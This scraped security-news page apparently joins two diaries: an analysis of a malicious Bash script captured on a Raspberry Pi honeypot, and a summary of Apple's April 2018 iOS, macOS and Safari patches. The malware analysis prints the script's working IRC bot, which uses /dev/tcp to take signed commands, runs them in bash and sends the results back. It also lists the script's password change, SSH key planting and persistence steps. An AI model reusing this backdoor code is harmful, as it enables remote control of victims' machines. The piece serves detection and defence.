Apple iOS and macOS Multiple Security Vulnerabilities
 
Apple iOS APPLE-SA-2018-04-24-1 Multiple Security Vulnerabilities
 
APPLE-SA-2018-04-24-3 Safari 11.1 (v. 11605.1.33.1.4, 12605.1.33.1.4, and 13605.1.33.1.4)
 
APPLE-SA-2018-04-24-2 Security Update 2018-001
 
APPLE-SA-2018-04-24-1 iOS 11.3.1
 

One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry.  It's a simple UNIX Bash script that performs a bunch of malicious tasks:

  • Kills existing crypto miner processes (classic action these days)
  • Changes the password of the user 'pi' and adds an SSH key 
  • Changes the DNS resolver configuration and add some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
  • Creates an IRC bot
  • Installs extra tools like zmap and sshpass
  • Installs itself in /etc/rc.local for persistence

The script itself is not new, it was already spotted in July 2017 but it looks to be slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is the ability to run a simple IRC bot in using Bash commands. No need for a high-level language. Bash has a very interesting feature for years that not many people are aware of. You can generate network flows using standard redirections. By default, a UNIX process has always the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:

$ echo "Hello world" >/dev/stderr

In the same way, Bash can use /dev/tcp or /dev/udp to generate network flow. The syntax is /dev/<proto>/>host>/>port>.

That's the feature used in the sample. Here is how to create a simple bot (the code has been beautified):

eval 'exec 3<>/dev/tcp/$ircserver/6667;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
# Main loop
while [ true ]; do
    eval "read msg_in <&3;"
    if [[ ! "$?" -eq 0 ]] ; then
        break
    fi
    if  [[ "$msg_in" =~ "PING" ]] ; then
        printf "PONG %s\n" "${msg_in:5}";
        eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
        sleep 1
        eval 'printf "JOIN #biret\r\n" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
    elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
        privmsg_h=$(echo $msg_in| cut -d':' -f 3)
        privmsg_data=$(echo $msg_in| cut -d':' -f 4)
        privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
        hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
        sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`

        if [[ "$sign" == "$hash" ]] ; then
            CMD=`echo $privmsg_data | base64 -d -i`
            RES=`bash -c "$CMD" | base64 -w 0`
            eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        fi
    fi
done

The magic line is the first one which created a new file descriptor ('3') that will be used to read/write to the TCP session established with the IRC server on port 6667. The attacker is able to submit commands to the bot via private messages (once authenticated). The result of the command is sent back. 

Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use this specific feature, you can always recompile a Bash with the following directive '--enable-net-redirections'. This can be helpful in many cases. Example to grab data from a remote server without external tools:

exec 5<> /dev/tcp/blog.rootshell.be/80
printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5
cat <&5
exec 5>&-

A simple way to detect this behaviour is to search for network flows generated by /bin/bash processed. Example using lsof[3]:

# lsof -i | grep bash
bash      81084 xavier    5u  IPv4 0x1cbc30b70d8a7879      0t0  TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED)

[1] https://isc.sans.edu/honeypot.html
[2] https://www.virustotal.com/#/file/ce53ae1c4f43f9f63b61fa1abd675cb8c0893aa3ffb50506fc401c5978318f74/detection
[3] https://www.forensicswiki.org/wiki/Lsof

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Apple today released updated for Safari, macOS and iOS. The patches fix 4 different vulnerabilities. The most severe of the vulnerabilities affect WebKit. These vulnerablities could be exploited to execute arbitrary code if a user visits a malicous site.

Note that WebKit is also included in tvOS and watchOS. A patch release for these operating systems may be imminent and I will update this article as I see them.

Vulnerability Overview

CVE iOS MacOS/Safari Severity
%%cve:2018-4200%% yes yes critical
%%cve:2018-4204%% yes yes critical
%%cve:2018-4206%% yes yes important
%%cve:2018-4187%% yes yes important

Safari 11.1

This update patches two vulnerabilities in WebKit. This update also applies to older still supported versions of OS X / MacOS (10.11/12, El Capitan, Sierra) in addition to the latest version ( High Sierra, 10.13.4). iOS patches the same WebKit vulnerablities.

Vulnerability Impact Description CVE
WebKit Processing maliciously crafted web content may lead to arbitrary code execution A memory corruption issue was addressed with improved state management. %%cve:2018-4200%%
WebKit Processing maliciously crafted web content may lead to arbitrary code execution A memory corruption issue was addressed with improved memory handling. %%cve:2018-4204%%

MacOS Security update 2018-001 for macOS High Sierra 10.13

For MacOS High Sierra (10.13), Apple patches two vulnerabilities. One fixes a vulnerability in Crash Reporter, the second one fixes a vulnerability in how URL links are displayed.

Vulnerability Impact Description CVE
Crash Reporter An application may be able to gain elevated privileges A memory corruption issue was addressed with improved error handling. %%cve:2018-4206%%
LinkPresentation Processing a maliciously crafted text message may lead to UI spoofing A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. %%cve:2018-4187%%

iOS 11.3.1

4 Vulnerabilities are being patched in iOS 11.3. The update applies to iPhone 5s and later, iPad Air and later, and iPod touch 6th generation.

The iOS update is essentially the sum of the macOS and Safari update.

Vulnerability Impact Description CVE
Crash Reporter An application may be able to gain elevated privileges A memory corruption issue was addressed with improved error handling. %%cve:2018-4206%%
LinkPresentation Processing a maliciously crafted text message may lead to UI spoofing A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. %%cve:2018-4187%%
WebKit Processing maliciously crafted web content may lead to arbitrary code execution A memory corruption issue was addressed with improved state management. %%cve:2018-4200%%
WebKit Processing maliciously crafted web content may lead to arbitrary code execution A memory corruption issue was addressed with improved memory handling. %%cve:2018-4204%%

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Internet Storm Center Infocon Status